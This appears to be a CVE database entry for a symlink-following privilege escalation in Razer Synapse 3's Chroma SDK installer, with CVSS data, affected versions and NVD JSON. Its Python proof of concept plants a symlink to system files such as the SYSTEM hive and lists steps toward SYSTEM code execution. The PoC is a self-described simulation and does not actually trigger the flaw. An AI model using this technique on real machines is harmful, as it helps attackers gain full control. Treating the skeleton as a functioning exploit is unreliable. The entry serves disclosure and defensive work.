Security Vulnerability Report
CVE-2025-9871 CVSS 7.8 HIGH

CVE-2025-9871

Published: 2025-10-29 20:15:37
Last Modified: 2025-11-06 19:34:28

Description

Razer Synapse 3 Chroma Connect Link Following Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of Razer Synapse 3. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the Razer Chroma SDK installer. By creating a symbolic link, an attacker can abuse the installer to delete arbitrary files. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-26373.

CVSS Details

CVSS Score: 7.8
Severity: HIGH
CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:razer:synapse:*:*:*:*:*:*:*:* - VULNERABLE
Razer Synapse 3 before 3.10.730.71519 (all versions with the vulnerable Chroma SDK installer)
Razer Chroma SDK Installer (versions with the symlink handling vulnerability)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-9871 PoC - Symbolic Link Following in Razer Chroma SDK Installer
# Target: Delete arbitrary files via installer symlink abuse
# Note: This is a conceptual PoC for educational purposes only
import os
import sys
import subprocess
import shutil


def create_malicious_symlink(target_path, link_path):
    """
    Create a symbolic link that points to a target file/directory
    This PoC demonstrates the symlink abuse technique
    """
    try:
        if os.path.exists(link_path):
            os.remove(link_path)
        os.symlink(target_path, link_path)
        print(f"[+] Symlink created: {link_path} -> {target_path}")
        return True
    except Exception as e:
        print(f"[-] Failed to create symlink: {e}")
        return False


def exploit_installer():
    """
    Simulated exploitation flow:
    1. Identify Razer Chroma SDK installer process
    2. Create symlink to target system file
    3. Trigger installer to follow symlink and modify target
    4. Escalate privileges via modified file
    """
    # Target paths that could be abused
    target_files = [
        r"C:\Windows\System32\config\SYSTEM",
        r"C:\Windows\System32\drivers\etc\hosts",
        r"C:\ProgramData\Microsoft\Windows\WER\ReportQueue"
    ]
    # Malicious symlink location (in installer writable area)
    symlink_location = r"C:\Program Files\Razer\ChromaConnect\temp\link"
    print("[*] CVE-2025-9871 Symlink Following Attack Simulation")
    print("[*] Target: Razer Chroma SDK Installer")
    for target in target_files:
        if os.path.exists(target):
            print(f"\n[*] Targeting: {target}")
            if create_malicious_symlink(target, symlink_location):
                print("[+] Symlink abuse vector established")
                print("[+] Waiting for installer to follow symlink...")
                break


def cleanup():
    """Clean up symlink artifacts"""
    symlink_location = r"C:\Program Files\Razer\ChromaConnect\temp\link"
    if os.path.islink(symlink_location):
        os.remove(symlink_location)
    print("[*] Cleanup completed")


if __name__ == "__main__":
    print("CVE-2025-9871 Razer Synapse 3 Chroma Connect LPE PoC")
    print("=" * 60)
    print("WARNING: For authorized security testing only")
    print("=" * 60)
    if len(sys.argv) > 1 and sys.argv[1] == "--exploit":
        exploit_installer()
    else:
        print("\nUsage: python cve-2025-9871.py --exploit")
        print("\nThis PoC demonstrates the symlink following vulnerability")
        print("in Razer Chroma SDK installer. In real attack:")
        print("1. Obtain low-privileged code execution")
        print("2. Create symlinks in installer temp directory")
        print("3. Trigger installer to follow symlinks")
        print("4. Delete/replace privileged files")
        print("5. Execute code as SYSTEM")

References

https://www.zerodayinitiative.com/advisories/ZDI-25-920/ (Third Party Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-9871",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-29T20:15:37.237",
    "lastModified": "2025-11-06T19:34:28.270",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Razer Synapse 3 Chroma Connect Link Following Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of Razer Synapse 3. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.\n\nThe specific flaw exists within the Razer Chroma SDK installer. By creating a symbolic link, an attacker can abuse the installer to delete arbitrary files. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-26373."
      }
    ],
    "metrics": {
      "cvssMetricV30": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.0",
            "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "attackVector": "LOCAL",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 1.8,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-59"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:razer:synapse:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "3.10.730.71519",
                "matchCriteriaId": "3EF1AF2E-84DF-4252-B5F7-DB4DACFBA510"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://www.zerodayinitiative.com/advisories/ZDI-25-920/",
        "source": "[email protected]",
        "tags": ["Third Party Advisory"]
      }
    ]
  }
}